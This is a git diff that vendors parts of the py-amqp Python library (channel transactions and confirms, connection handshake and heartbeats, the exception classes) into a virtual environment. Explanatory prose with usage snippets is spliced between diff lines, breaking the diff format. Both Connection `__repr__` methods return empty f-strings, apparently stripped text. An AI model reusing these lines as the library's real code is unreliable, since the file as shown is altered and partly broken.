+ """ + return self.send_method( + spec.Basic.Reject, argsig, (delivery_tag, requeue), + ) + + def _on_basic_return(self, reply_code, reply_text, + exchange, routing_key, message): + """Return a failed message. + + This method returns an undeliverable message that was + published with the "immediate" flag set, or an unroutable + message published with the "mandatory" flag set. The reply + code and text provide information about the reason that the + message was undeliverable. + + PARAMETERS: + reply_code: short + + The reply code. The AMQ reply codes are defined in AMQ + RFC 011. + + reply_text: shortstr + + The localised reply text. This text can be logged as an + aid to resolving issues. + + exchange: shortstr + + Specifies the name of the exchange that the message + was originally published to. + + routing_key: shortstr + + Message routing key + + Specifies the routing key name specified when the + message was published. + """ + exc = error_for_code( + reply_code, reply_text, spec.Basic.Return, ChannelError, + ) + handlers = self.events.get('basic_return') + if not handlers: + raise exc + for callback in handlers: + callback(exc, exchange, routing_key, message) + + ############# + # + # Tx + # + # + # work with standard transactions + # + # Standard transactions provide so-called "1.5 phase commit". We + # can ensure that work is never lost, but there is a chance of + # confirmations being lost, so that messages may be resent. + # Applications that use standard transactions must be able to + # detect and ignore duplicate messages. + # + # GRAMMAR:: + # + # tx = C:SELECT S:SELECT-OK + # / C:COMMIT S:COMMIT-OK + # / C:ROLLBACK S:ROLLBACK-OK + # + # RULE: + # + # An client using standard transactions SHOULD be able to + # track all messages received within a reasonable period, and + # thus detect and reject duplicates of the same message. It + # SHOULD NOT pass these to the application layer. + # + # + + def tx_commit(self): + """Commit the current transaction. + + This method commits all messages published and acknowledged in + the current transaction. A new transaction starts immediately + after a commit. + """ + return self.send_method(spec.Tx.Commit, wait=spec.Tx.CommitOk) + + def tx_rollback(self): + """Abandon the current transaction. + + This method abandons all messages published and acknowledged + in the current transaction. A new transaction starts + immediately after a rollback. + """ + return self.send_method(spec.Tx.Rollback, wait=spec.Tx.RollbackOk) + + def tx_select(self): + """Select standard transaction mode. + + This method sets the channel to use standard transactions. + The client must use this method at least once on a channel + before using the Commit or Rollback methods. + """ + return self.send_method(spec.Tx.Select, wait=spec.Tx.SelectOk) + + def confirm_select(self, nowait=False): + """Enable publisher confirms for this channel. + + Note: This is an RabbitMQ extension. + + Can now be used if the channel is in transactional mode. + + :param nowait: + If set, the server will not respond to the method. + The client should not wait for a reply method. If the + server could not complete the method it will raise a channel + or connection exception. 
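
Standard transactions batch publishes (and acknowledgements) so they take effect atomically on `tx_commit`, or are discarded by `tx_rollback`. A sketch, assuming `amqp.Message` (the package's basic message class) and an illustrative `'jobs'` routing key:

```python
import amqp

ch.tx_select()                             # switch the channel to transactional mode
for body in ('job-1', 'job-2'):
    ch.basic_publish(amqp.Message(body), exchange='', routing_key='jobs')
ch.tx_commit()                             # both messages become visible atomically
# ch.tx_rollback() would instead discard everything published since the last commit
```
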
+ """ + return self.send_method( + spec.Confirm.Select, 'b', (nowait,), + wait=None if nowait else spec.Confirm.SelectOk, + ) + + def _on_basic_ack(self, delivery_tag, multiple): + for callback in self.events['basic_ack']: + callback(delivery_tag, multiple) + + def _on_basic_nack(self, delivery_tag, multiple): + for callback in self.events['basic_nack']: + callback(delivery_tag, multiple) diff --git a/env/Lib/site-packages/amqp/connection.py b/env/Lib/site-packages/amqp/connection.py new file mode 100644 index 00000000..24bfb667 --- /dev/null +++ b/env/Lib/site-packages/amqp/connection.py @@ -0,0 +1,778 @@ +"""AMQP Connections.""" +# Copyright (C) 2007-2008 Barry Pederson + +import logging +import socket +import uuid +import warnings +from array import array +from time import monotonic + +from vine import ensure_promise + +from . import __version__, sasl, spec +from .abstract_channel import AbstractChannel +from .channel import Channel +from .exceptions import (AMQPDeprecationWarning, ChannelError, ConnectionError, + ConnectionForced, RecoverableChannelError, + RecoverableConnectionError, ResourceError, + error_for_code) +from .method_framing import frame_handler, frame_writer +from .transport import Transport + +try: + from ssl import SSLError +except ImportError: # pragma: no cover + class SSLError(Exception): # noqa + pass + +W_FORCE_CONNECT = """\ +The .{attr} attribute on the connection was accessed before +the connection was established. This is supported for now, but will +be deprecated in amqp 2.2.0. + +Since amqp 2.0 you have to explicitly call Connection.connect() +before using the connection. +""" + +START_DEBUG_FMT = """ +Start from server, version: %d.%d, properties: %s, mechanisms: %s, locales: %s +""".strip() + +__all__ = ('Connection',) + +AMQP_LOGGER = logging.getLogger('amqp') +AMQP_HEARTBEAT_LOGGER = logging.getLogger( + 'amqp.connection.Connection.heartbeat_tick' +) + +#: Default map for :attr:`Connection.library_properties` +LIBRARY_PROPERTIES = { + 'product': 'py-amqp', + 'product_version': __version__, +} + +#: Default map for :attr:`Connection.negotiate_capabilities` +NEGOTIATE_CAPABILITIES = { + 'consumer_cancel_notify': True, + 'connection.blocked': True, + 'authentication_failure_close': True, +} + + +class Connection(AbstractChannel): + """AMQP Connection. + + The connection class provides methods for a client to establish a + network connection to a server, and for both peers to operate the + connection thereafter. + + GRAMMAR:: + + connection = open-connection *use-connection close-connection + open-connection = C:protocol-header + S:START C:START-OK + *challenge + S:TUNE C:TUNE-OK + C:OPEN S:OPEN-OK + challenge = S:SECURE C:SECURE-OK + use-connection = *channel + close-connection = C:CLOSE S:CLOSE-OK + / S:CLOSE C:CLOSE-OK + Create a connection to the specified host, which should be + a 'host[:port]', such as 'localhost', or '1.2.3.4:5672' + (defaults to 'localhost', if a port is not specified then + 5672 is used) + + Authentication can be controlled by passing one or more + `amqp.sasl.SASL` instances as the `authentication` parameter, or + setting the `login_method` string to one of the supported methods: + 'GSSAPI', 'EXTERNAL', 'AMQPLAIN', or 'PLAIN'. + Otherwise authentication will be performed using any supported method + preferred by the server. Userid and passwords apply to AMQPLAIN and + PLAIN authentication, whereas on GSSAPI only userid will be used as the + client name. For EXTERNAL authentication both userid and password are + ignored. 
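
Publisher confirms are the lighter-weight alternative to transactions: constructing the connection with `confirm_publish=True` swaps `basic_publish` for `basic_publish_confirm` (shown earlier), which waits for Basic.Ack and raises `MessageNacked` if the broker refuses the message. A sketch; the import path `amqp.exceptions.MessageNacked` and the `'task_queue'` routing key are assumptions:

```python
import amqp
from amqp.exceptions import MessageNacked   # assumption: exception lives in amqp.exceptions

conn = amqp.Connection('localhost:5672', userid='guest', password='guest',
                       confirm_publish=True)
conn.connect()
ch = conn.channel()
try:
    ch.basic_publish(amqp.Message('important payload'),
                     exchange='', routing_key='task_queue',
                     confirm_timeout=5)     # wait at most 5s for the broker's Ack/Nack
except MessageNacked:
    print('broker rejected the message')
finally:
    conn.close()
```
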
+ + The 'ssl' parameter may be simply True/False, or + a dictionary of options to pass to :class:`ssl.SSLContext` such as + requiring certain certificates. For details, refer ``ssl`` parameter of + :class:`~amqp.transport.SSLTransport`. + + The "socket_settings" parameter is a dictionary defining tcp + settings which will be applied as socket options. + + When "confirm_publish" is set to True, the channel is put to + confirm mode. In this mode, each published message is + confirmed using Publisher confirms RabbitMQ extension. + """ + + Channel = Channel + + #: Mapping of protocol extensions to enable. + #: The server will report these in server_properties[capabilities], + #: and if a key in this map is present the client will tell the + #: server to either enable or disable the capability depending + #: on the value set in this map. + #: For example with: + #: negotiate_capabilities = { + #: 'consumer_cancel_notify': True, + #: } + #: The client will enable this capability if the server reports + #: support for it, but if the value is False the client will + #: disable the capability. + negotiate_capabilities = NEGOTIATE_CAPABILITIES + + #: These are sent to the server to announce what features + #: we support, type of client etc. + library_properties = LIBRARY_PROPERTIES + + #: Final heartbeat interval value (in float seconds) after negotiation + heartbeat = None + + #: Original heartbeat interval value proposed by client. + client_heartbeat = None + + #: Original heartbeat interval proposed by server. + server_heartbeat = None + + #: Time of last heartbeat sent (in monotonic time, if available). + last_heartbeat_sent = 0 + + #: Time of last heartbeat received (in monotonic time, if available). + last_heartbeat_received = 0 + + #: Number of successful writes to socket. + bytes_sent = 0 + + #: Number of successful reads from socket. + bytes_recv = 0 + + #: Number of bytes sent to socket at the last heartbeat check. + prev_sent = None + + #: Number of bytes received from socket at the last heartbeat check. 
+ prev_recv = None + + _METHODS = { + spec.method(spec.Connection.Start, 'ooFSS'), + spec.method(spec.Connection.OpenOk), + spec.method(spec.Connection.Secure, 's'), + spec.method(spec.Connection.Tune, 'BlB'), + spec.method(spec.Connection.Close, 'BsBB'), + spec.method(spec.Connection.Blocked), + spec.method(spec.Connection.Unblocked), + spec.method(spec.Connection.CloseOk), + } + _METHODS = {m.method_sig: m for m in _METHODS} + + _ALLOWED_METHODS_WHEN_CLOSING = ( + spec.Connection.Close, spec.Connection.CloseOk + ) + + connection_errors = ( + ConnectionError, + socket.error, + IOError, + OSError, + ) + channel_errors = (ChannelError,) + recoverable_connection_errors = ( + RecoverableConnectionError, + socket.error, + IOError, + OSError, + ) + recoverable_channel_errors = ( + RecoverableChannelError, + ) + + def __init__(self, host='localhost:5672', userid='guest', password='guest', + login_method=None, login_response=None, + authentication=(), + virtual_host='/', locale='en_US', client_properties=None, + ssl=False, connect_timeout=None, channel_max=None, + frame_max=None, heartbeat=0, on_open=None, on_blocked=None, + on_unblocked=None, confirm_publish=False, + on_tune_ok=None, read_timeout=None, write_timeout=None, + socket_settings=None, frame_handler=frame_handler, + frame_writer=frame_writer, **kwargs): + self._connection_id = uuid.uuid4().hex + channel_max = channel_max or 65535 + frame_max = frame_max or 131072 + if authentication: + if isinstance(authentication, sasl.SASL): + authentication = (authentication,) + self.authentication = authentication + elif login_method is not None: + if login_method == 'GSSAPI': + auth = sasl.GSSAPI(userid) + elif login_method == 'EXTERNAL': + auth = sasl.EXTERNAL() + elif login_method == 'AMQPLAIN': + if userid is None or password is None: + raise ValueError( + "Must supply authentication or userid/password") + auth = sasl.AMQPLAIN(userid, password) + elif login_method == 'PLAIN': + if userid is None or password is None: + raise ValueError( + "Must supply authentication or userid/password") + auth = sasl.PLAIN(userid, password) + elif login_response is not None: + auth = sasl.RAW(login_method, login_response) + else: + raise ValueError("Invalid login method", login_method) + self.authentication = (auth,) + else: + self.authentication = (sasl.GSSAPI(userid, fail_soft=True), + sasl.EXTERNAL(), + sasl.AMQPLAIN(userid, password), + sasl.PLAIN(userid, password)) + + self.client_properties = dict( + self.library_properties, **client_properties or {} + ) + self.locale = locale + self.host = host + self.virtual_host = virtual_host + self.on_tune_ok = ensure_promise(on_tune_ok) + + self.frame_handler_cls = frame_handler + self.frame_writer_cls = frame_writer + + self._handshake_complete = False + + self.channels = {} + # The connection object itself is treated as channel 0 + super().__init__(self, 0) + + self._frame_writer = None + self._on_inbound_frame = None + self._transport = None + + # Properties set in the Tune method + self.channel_max = channel_max + self.frame_max = frame_max + self.client_heartbeat = heartbeat + + self.confirm_publish = confirm_publish + self.ssl = ssl + self.read_timeout = read_timeout + self.write_timeout = write_timeout + self.socket_settings = socket_settings + + # Callbacks + self.on_blocked = on_blocked + self.on_unblocked = on_unblocked + self.on_open = ensure_promise(on_open) + + self._used_channel_ids = array('H') + + # Properties set in the Start method + self.version_major = 0 + self.version_minor = 0 + 
self.server_properties = {} + self.mechanisms = [] + self.locales = [] + + self.connect_timeout = connect_timeout + + def __repr__(self): + if self._transport: + return f'' + else: + return f'' + + def __enter__(self): + self.connect() + return self + + def __exit__(self, *eargs): + self.close() + + def then(self, on_success, on_error=None): + return self.on_open.then(on_success, on_error) + + def _setup_listeners(self): + self._callbacks.update({ + spec.Connection.Start: self._on_start, + spec.Connection.OpenOk: self._on_open_ok, + spec.Connection.Secure: self._on_secure, + spec.Connection.Tune: self._on_tune, + spec.Connection.Close: self._on_close, + spec.Connection.Blocked: self._on_blocked, + spec.Connection.Unblocked: self._on_unblocked, + spec.Connection.CloseOk: self._on_close_ok, + }) + + def connect(self, callback=None): + # Let the transport.py module setup the actual + # socket connection to the broker. + # + if self.connected: + return callback() if callback else None + try: + self.transport = self.Transport( + self.host, self.connect_timeout, self.ssl, + self.read_timeout, self.write_timeout, + socket_settings=self.socket_settings, + ) + self.transport.connect() + self.on_inbound_frame = self.frame_handler_cls( + self, self.on_inbound_method) + self.frame_writer = self.frame_writer_cls(self, self.transport) + + while not self._handshake_complete: + self.drain_events(timeout=self.connect_timeout) + + except (OSError, SSLError): + self.collect() + raise + + def _warn_force_connect(self, attr): + warnings.warn(AMQPDeprecationWarning( + W_FORCE_CONNECT.format(attr=attr))) + + @property + def transport(self): + if self._transport is None: + self._warn_force_connect('transport') + self.connect() + return self._transport + + @transport.setter + def transport(self, transport): + self._transport = transport + + @property + def on_inbound_frame(self): + if self._on_inbound_frame is None: + self._warn_force_connect('on_inbound_frame') + self.connect() + return self._on_inbound_frame + + @on_inbound_frame.setter + def on_inbound_frame(self, on_inbound_frame): + self._on_inbound_frame = on_inbound_frame + + @property + def frame_writer(self): + if self._frame_writer is None: + self._warn_force_connect('frame_writer') + self.connect() + return self._frame_writer + + @frame_writer.setter + def frame_writer(self, frame_writer): + self._frame_writer = frame_writer + + def _on_start(self, version_major, version_minor, server_properties, + mechanisms, locales, argsig='FsSs'): + client_properties = self.client_properties + self.version_major = version_major + self.version_minor = version_minor + self.server_properties = server_properties + if isinstance(mechanisms, str): + mechanisms = mechanisms.encode('utf-8') + self.mechanisms = mechanisms.split(b' ') + self.locales = locales.split(' ') + AMQP_LOGGER.debug( + START_DEBUG_FMT, + self.version_major, self.version_minor, + self.server_properties, self.mechanisms, self.locales, + ) + + # Negotiate protocol extensions (capabilities) + scap = server_properties.get('capabilities') or {} + cap = client_properties.setdefault('capabilities', {}) + cap.update({ + wanted_cap: enable_cap + for wanted_cap, enable_cap in self.negotiate_capabilities.items() + if scap.get(wanted_cap) + }) + if not cap: + # no capabilities, server may not react well to having + # this key present in client_properties, so we remove it. 
+ client_properties.pop('capabilities', None) + + for authentication in self.authentication: + if authentication.mechanism in self.mechanisms: + login_response = authentication.start(self) + if login_response is not NotImplemented: + break + else: + raise ConnectionError( + "Couldn't find appropriate auth mechanism " + "(can offer: {}; available: {})".format( + b", ".join(m.mechanism + for m in self.authentication + if m.mechanism).decode(), + b", ".join(self.mechanisms).decode())) + + self.send_method( + spec.Connection.StartOk, argsig, + (client_properties, authentication.mechanism, + login_response, self.locale), + ) + + def _on_secure(self, challenge): + pass + + def _on_tune(self, channel_max, frame_max, server_heartbeat, argsig='BlB'): + client_heartbeat = self.client_heartbeat or 0 + self.channel_max = channel_max or self.channel_max + self.frame_max = frame_max or self.frame_max + self.server_heartbeat = server_heartbeat or 0 + + # negotiate the heartbeat interval to the smaller of the + # specified values + if self.server_heartbeat == 0 or client_heartbeat == 0: + self.heartbeat = max(self.server_heartbeat, client_heartbeat) + else: + self.heartbeat = min(self.server_heartbeat, client_heartbeat) + + # Ignore server heartbeat if client_heartbeat is disabled + if not self.client_heartbeat: + self.heartbeat = 0 + + self.send_method( + spec.Connection.TuneOk, argsig, + (self.channel_max, self.frame_max, self.heartbeat), + callback=self._on_tune_sent, + ) + + def _on_tune_sent(self, argsig='ssb'): + self.send_method( + spec.Connection.Open, argsig, (self.virtual_host, '', False), + ) + + def _on_open_ok(self): + self._handshake_complete = True + self.on_open(self) + + def Transport(self, host, connect_timeout, + ssl=False, read_timeout=None, write_timeout=None, + socket_settings=None, **kwargs): + return Transport( + host, connect_timeout=connect_timeout, ssl=ssl, + read_timeout=read_timeout, write_timeout=write_timeout, + socket_settings=socket_settings, **kwargs) + + @property + def connected(self): + return self._transport and self._transport.connected + + def collect(self): + if self._transport: + self._transport.close() + + if self.channels: + # Copy all the channels except self since the channels + # dictionary changes during the collection process. + channels = [ + ch for ch in self.channels.values() + if ch is not self + ] + + for ch in channels: + ch.collect() + self._transport = self.connection = self.channels = None + + def _get_free_channel_id(self): + # Cast to a set for fast lookups, and keep stored as an array for lower memory usage. + used_channel_ids = set(self._used_channel_ids) + + for channel_id in range(1, self.channel_max + 1): + if channel_id not in used_channel_ids: + self._used_channel_ids.append(channel_id) + return channel_id + + raise ResourceError( + 'No free channel ids, current={}, channel_max={}'.format( + len(self.channels), self.channel_max), spec.Channel.Open) + + def _claim_channel_id(self, channel_id): + if channel_id in self._used_channel_ids: + raise ConnectionError(f'Channel {channel_id!r} already open') + else: + self._used_channel_ids.append(channel_id) + return channel_id + + def channel(self, channel_id=None, callback=None): + """Create new channel. + + Fetch a Channel object identified by the numeric channel_id, or + create that object if it doesn't already exist. 
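+
+ Example (illustrative; host and channel numbers are placeholders)::
+
+ conn = Connection('localhost:5672')
+ conn.connect()
+ ch = conn.channel() # the next free channel id is claimed
+ ch2 = conn.channel(2) # a specific channel id is requested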
+ """ + if self.channels is None: + raise RecoverableConnectionError('Connection already closed.') + + try: + return self.channels[channel_id] + except KeyError: + channel = self.Channel(self, channel_id, on_open=callback) + channel.open() + return channel + + def is_alive(self): + raise NotImplementedError('Use AMQP heartbeats') + + def drain_events(self, timeout=None): + # read until message is ready + while not self.blocking_read(timeout): + pass + + def blocking_read(self, timeout=None): + with self.transport.having_timeout(timeout): + frame = self.transport.read_frame() + return self.on_inbound_frame(frame) + + def on_inbound_method(self, channel_id, method_sig, payload, content): + if self.channels is None: + raise RecoverableConnectionError('Connection already closed') + + return self.channels[channel_id].dispatch_method( + method_sig, payload, content, + ) + + def close(self, reply_code=0, reply_text='', method_sig=(0, 0), + argsig='BsBB'): + """Request a connection close. + + This method indicates that the sender wants to close the + connection. This may be due to internal conditions (e.g. a + forced shut-down) or due to an error handling a specific + method, i.e. an exception. When a close is due to an + exception, the sender provides the class and method id of the + method which caused the exception. + + RULE: + + After sending this method any received method except the + Close-OK method MUST be discarded. + + RULE: + + The peer sending this method MAY use a counter or timeout + to detect failure of the other peer to respond correctly + with the Close-OK method. + + RULE: + + When a server receives the Close method from a client it + MUST delete all server-side resources associated with the + client's context. A client CANNOT reconnect to a context + after sending or receiving a Close method. + + PARAMETERS: + reply_code: short + + The reply code. The AMQ reply codes are defined in AMQ + RFC 011. + + reply_text: shortstr + + The localised reply text. This text can be logged as an + aid to resolving issues. + + class_id: short + + failing method class + + When the close is provoked by a method exception, this + is the class of the method. + + method_id: short + + failing method ID + + When the close is provoked by a method exception, this + is the ID of the method. + """ + if self._transport is None: + # already closed + return + + try: + self.is_closing = True + return self.send_method( + spec.Connection.Close, argsig, + (reply_code, reply_text, method_sig[0], method_sig[1]), + wait=spec.Connection.CloseOk, + ) + except (OSError, SSLError): + # close connection + self.collect() + raise + finally: + self.is_closing = False + + def _on_close(self, reply_code, reply_text, class_id, method_id): + """Request a connection close. + + This method indicates that the sender wants to close the + connection. This may be due to internal conditions (e.g. a + forced shut-down) or due to an error handling a specific + method, i.e. an exception. When a close is due to an + exception, the sender provides the class and method id of the + method which caused the exception. + + RULE: + + After sending this method any received method except the + Close-OK method MUST be discarded. + + RULE: + + The peer sending this method MAY use a counter or timeout + to detect failure of the other peer to respond correctly + with the Close-OK method. + + RULE: + + When a server receives the Close method from a client it + MUST delete all server-side resources associated with the + client's context. 
A client CANNOT reconnect to a context + after sending or receiving a Close method. + + PARAMETERS: + reply_code: short + + The reply code. The AMQ reply codes are defined in AMQ + RFC 011. + + reply_text: shortstr + + The localised reply text. This text can be logged as an + aid to resolving issues. + + class_id: short + + failing method class + + When the close is provoked by a method exception, this + is the class of the method. + + method_id: short + + failing method ID + + When the close is provoked by a method exception, this + is the ID of the method. + """ + self._x_close_ok() + raise error_for_code(reply_code, reply_text, + (class_id, method_id), ConnectionError) + + def _x_close_ok(self): + """Confirm a connection close. + + This method confirms a Connection.Close method and tells the + recipient that it is safe to release resources for the + connection and close the socket. + + RULE: + A peer that detects a socket closure without having + received a Close-Ok handshake method SHOULD log the error. + """ + self.send_method(spec.Connection.CloseOk, callback=self._on_close_ok) + + def _on_close_ok(self): + """Confirm a connection close. + + This method confirms a Connection.Close method and tells the + recipient that it is safe to release resources for the + connection and close the socket. + + RULE: + + A peer that detects a socket closure without having + received a Close-Ok handshake method SHOULD log the error. + """ + self.collect() + + def _on_blocked(self): + """Callback called when connection blocked. + + Notes: + This is a RabbitMQ extension. + """ + reason = 'connection blocked, see broker logs' + if self.on_blocked: + return self.on_blocked(reason) + + def _on_unblocked(self): + if self.on_unblocked: + return self.on_unblocked() + + def send_heartbeat(self): + self.frame_writer(8, 0, None, None, None) + + def heartbeat_tick(self, rate=2): + """Send heartbeat packets if necessary. + + Raises: + ~amqp.exceptions.ConnectionForced: if none have been + received recently. + + Note: + This should be called frequently, on the order of + once per second. + + Keyword Arguments: + rate (int): Previously used, but ignored now. + """ + AMQP_HEARTBEAT_LOGGER.debug('heartbeat_tick : for connection %s', + self._connection_id) + if not self.heartbeat: + return + + # treat actual data exchange in either direction as a heartbeat + sent_now = self.bytes_sent + recv_now = self.bytes_recv + if self.prev_sent is None or self.prev_sent != sent_now: + self.last_heartbeat_sent = monotonic() + if self.prev_recv is None or self.prev_recv != recv_now: + self.last_heartbeat_received = monotonic() + + now = monotonic() + AMQP_HEARTBEAT_LOGGER.debug( + 'heartbeat_tick : Prev sent/recv: %s/%s, ' + 'now - %s/%s, monotonic - %s, ' + 'last_heartbeat_sent - %s, heartbeat int. 
- %s ' + 'for connection %s', + self.prev_sent, self.prev_recv, + sent_now, recv_now, now, + self.last_heartbeat_sent, + self.heartbeat, + self._connection_id, + ) + + self.prev_sent, self.prev_recv = sent_now, recv_now + + # send a heartbeat if it's time to do so + if now > self.last_heartbeat_sent + self.heartbeat: + AMQP_HEARTBEAT_LOGGER.debug( + 'heartbeat_tick: sending heartbeat for connection %s', + self._connection_id) + self.send_heartbeat() + self.last_heartbeat_sent = monotonic() + + # if we've missed two intervals' heartbeats, fail; this gives the + # server enough time to send heartbeats a little late + two_heartbeats = 2 * self.heartbeat + two_heartbeats_interval = self.last_heartbeat_received + two_heartbeats + heartbeats_missed = two_heartbeats_interval < monotonic() + if self.last_heartbeat_received and heartbeats_missed: + raise ConnectionForced('Too many heartbeats missed') + + @property + def sock(self): + return self.transport.sock + + @property + def server_capabilities(self): + return self.server_properties.get('capabilities') or {} diff --git a/env/Lib/site-packages/amqp/exceptions.py b/env/Lib/site-packages/amqp/exceptions.py new file mode 100644 index 00000000..0098dba9 --- /dev/null +++ b/env/Lib/site-packages/amqp/exceptions.py @@ -0,0 +1,288 @@ +"""Exceptions used by amqp.""" +# Copyright (C) 2007-2008 Barry Pederson + +from struct import pack, unpack + +__all__ = ( + 'AMQPError', + 'ConnectionError', 'ChannelError', + 'RecoverableConnectionError', 'IrrecoverableConnectionError', + 'RecoverableChannelError', 'IrrecoverableChannelError', + 'ConsumerCancelled', 'ContentTooLarge', 'NoConsumers', + 'ConnectionForced', 'InvalidPath', 'AccessRefused', 'NotFound', + 'ResourceLocked', 'PreconditionFailed', 'FrameError', 'FrameSyntaxError', + 'InvalidCommand', 'ChannelNotOpen', 'UnexpectedFrame', 'ResourceError', + 'NotAllowed', 'AMQPNotImplementedError', 'InternalError', + 'MessageNacked', + 'AMQPDeprecationWarning', +) + + +class AMQPDeprecationWarning(UserWarning): + """Warning for deprecated things.""" + + +class MessageNacked(Exception): + """Message was nacked by broker.""" + + +class AMQPError(Exception): + """Base class for all AMQP exceptions.""" + + code = 0 + + def __init__(self, reply_text=None, method_sig=None, + method_name=None, reply_code=None): + self.message = reply_text + self.reply_code = reply_code or self.code + self.reply_text = reply_text + self.method_sig = method_sig + self.method_name = method_name or '' + if method_sig and not self.method_name: + self.method_name = METHOD_NAME_MAP.get(method_sig, '') + Exception.__init__(self, reply_code, + reply_text, method_sig, self.method_name) + + def __str__(self): + if self.method: + return '{0.method}: ({0.reply_code}) {0.reply_text}'.format(self) + return self.reply_text or '<{}: unknown error>'.format( + type(self).__name__ + ) + + @property + def method(self): + return self.method_name or self.method_sig + + +class ConnectionError(AMQPError): + """AMQP Connection Error.""" + + +class ChannelError(AMQPError): + """AMQP Channel Error.""" + + +class RecoverableChannelError(ChannelError): + """Exception class for recoverable channel errors.""" + + +class IrrecoverableChannelError(ChannelError): + """Exception class for irrecoverable channel errors.""" + + +class RecoverableConnectionError(ConnectionError): + """Exception class for recoverable connection errors.""" + + +class IrrecoverableConnectionError(ConnectionError): + """Exception class for irrecoverable connection errors.""" + + +class 
Blocked(RecoverableConnectionError): + """AMQP Connection Blocked Predicate.""" + + +class ConsumerCancelled(RecoverableConnectionError): + """AMQP Consumer Cancelled Predicate.""" + + +class ContentTooLarge(RecoverableChannelError): + """AMQP Content Too Large Error.""" + + code = 311 + + +class NoConsumers(RecoverableChannelError): + """AMQP No Consumers Error.""" + + code = 313 + + +class ConnectionForced(RecoverableConnectionError): + """AMQP Connection Forced Error.""" + + code = 320 + + +class InvalidPath(IrrecoverableConnectionError): + """AMQP Invalid Path Error.""" + + code = 402 + + +class AccessRefused(IrrecoverableChannelError): + """AMQP Access Refused Error.""" + + code = 403 + + +class NotFound(IrrecoverableChannelError): + """AMQP Not Found Error.""" + + code = 404 + + +class ResourceLocked(RecoverableChannelError): + """AMQP Resource Locked Error.""" + + code = 405 + + +class PreconditionFailed(IrrecoverableChannelError): + """AMQP Precondition Failed Error.""" + + code = 406 + + +class FrameError(IrrecoverableConnectionError): + """AMQP Frame Error.""" + + code = 501 + + +class FrameSyntaxError(IrrecoverableConnectionError): + """AMQP Frame Syntax Error.""" + + code = 502 + + +class InvalidCommand(IrrecoverableConnectionError): + """AMQP Invalid Command Error.""" + + code = 503 + + +class ChannelNotOpen(IrrecoverableConnectionError): + """AMQP Channel Not Open Error.""" + + code = 504 + + +class UnexpectedFrame(IrrecoverableConnectionError): + """AMQP Unexpected Frame.""" + + code = 505 + + +class ResourceError(RecoverableConnectionError): + """AMQP Resource Error.""" + + code = 506 + + +class NotAllowed(IrrecoverableConnectionError): + """AMQP Not Allowed Error.""" + + code = 530 + + +class AMQPNotImplementedError(IrrecoverableConnectionError): + """AMQP Not Implemented Error.""" + + code = 540 + + +class InternalError(IrrecoverableConnectionError): + """AMQP Internal Error.""" + + code = 541 + + +ERROR_MAP = { + 311: ContentTooLarge, + 313: NoConsumers, + 320: ConnectionForced, + 402: InvalidPath, + 403: AccessRefused, + 404: NotFound, + 405: ResourceLocked, + 406: PreconditionFailed, + 501: FrameError, + 502: FrameSyntaxError, + 503: InvalidCommand, + 504: ChannelNotOpen, + 505: UnexpectedFrame, + 506: ResourceError, + 530: NotAllowed, + 540: AMQPNotImplementedError, + 541: InternalError, +} + + +def error_for_code(code, text, method, default): + try: + return ERROR_MAP[code](text, method, reply_code=code) + except KeyError: + return default(text, method, reply_code=code) + + +METHOD_NAME_MAP = { + (10, 10): 'Connection.start', + (10, 11): 'Connection.start_ok', + (10, 20): 'Connection.secure', + (10, 21): 'Connection.secure_ok', + (10, 30): 'Connection.tune', + (10, 31): 'Connection.tune_ok', + (10, 40): 'Connection.open', + (10, 41): 'Connection.open_ok', + (10, 50): 'Connection.close', + (10, 51): 'Connection.close_ok', + (20, 10): 'Channel.open', + (20, 11): 'Channel.open_ok', + (20, 20): 'Channel.flow', + (20, 21): 'Channel.flow_ok', + (20, 40): 'Channel.close', + (20, 41): 'Channel.close_ok', + (30, 10): 'Access.request', + (30, 11): 'Access.request_ok', + (40, 10): 'Exchange.declare', + (40, 11): 'Exchange.declare_ok', + (40, 20): 'Exchange.delete', + (40, 21): 'Exchange.delete_ok', + (40, 30): 'Exchange.bind', + (40, 31): 'Exchange.bind_ok', + (40, 40): 'Exchange.unbind', + (40, 41): 'Exchange.unbind_ok', + (50, 10): 'Queue.declare', + (50, 11): 'Queue.declare_ok', + (50, 20): 'Queue.bind', + (50, 21): 'Queue.bind_ok', + (50, 30): 'Queue.purge', + (50, 31): 
'Queue.purge_ok', + (50, 40): 'Queue.delete', + (50, 41): 'Queue.delete_ok', + (50, 50): 'Queue.unbind', + (50, 51): 'Queue.unbind_ok', + (60, 10): 'Basic.qos', + (60, 11): 'Basic.qos_ok', + (60, 20): 'Basic.consume', + (60, 21): 'Basic.consume_ok', + (60, 30): 'Basic.cancel', + (60, 31): 'Basic.cancel_ok', + (60, 40): 'Basic.publish', + (60, 50): 'Basic.return', + (60, 60): 'Basic.deliver', + (60, 70): 'Basic.get', + (60, 71): 'Basic.get_ok', + (60, 72): 'Basic.get_empty', + (60, 80): 'Basic.ack', + (60, 90): 'Basic.reject', + (60, 100): 'Basic.recover_async', + (60, 110): 'Basic.recover', + (60, 111): 'Basic.recover_ok', + (60, 120): 'Basic.nack', + (90, 10): 'Tx.select', + (90, 11): 'Tx.select_ok', + (90, 20): 'Tx.commit', + (90, 21): 'Tx.commit_ok', + (90, 30): 'Tx.rollback', + (90, 31): 'Tx.rollback_ok', + (85, 10): 'Confirm.select', + (85, 11): 'Confirm.select_ok', +} + + +for _method_id, _method_name in list(METHOD_NAME_MAP.items()): + METHOD_NAME_MAP[unpack('>I', pack('>HH', *_method_id))[0]] = \ + _method_name diff --git a/env/Lib/site-packages/amqp/method_framing.py b/env/Lib/site-packages/amqp/method_framing.py new file mode 100644 index 00000000..6c49833f --- /dev/null +++ b/env/Lib/site-packages/amqp/method_framing.py @@ -0,0 +1,189 @@ +"""Convert between frames and higher-level AMQP methods.""" +# Copyright (C) 2007-2008 Barry Pederson + +from collections import defaultdict +from struct import pack, pack_into, unpack_from + +from . import spec +from .basic_message import Message +from .exceptions import UnexpectedFrame +from .utils import str_to_bytes + +__all__ = ('frame_handler', 'frame_writer') + +#: Set of methods that require both a content frame and a body frame. +_CONTENT_METHODS = frozenset([ + spec.Basic.Return, + spec.Basic.Deliver, + spec.Basic.GetOk, +]) + + +#: Number of bytes reserved for protocol in a content frame. +#: We use this to calculate when a frame exceeeds the max frame size, +#: and if it does not the message will fit into the preallocated buffer. 
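+#: As a rough illustration of how this is used in frame_writer() below:
+#: a message goes through the single preallocated buffer only when
+#: len(args) + len(properties) + len(body) + FRAME_OVERHEAD fits within
+#: frame_max - 8; otherwise it falls back to one write() per frame.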
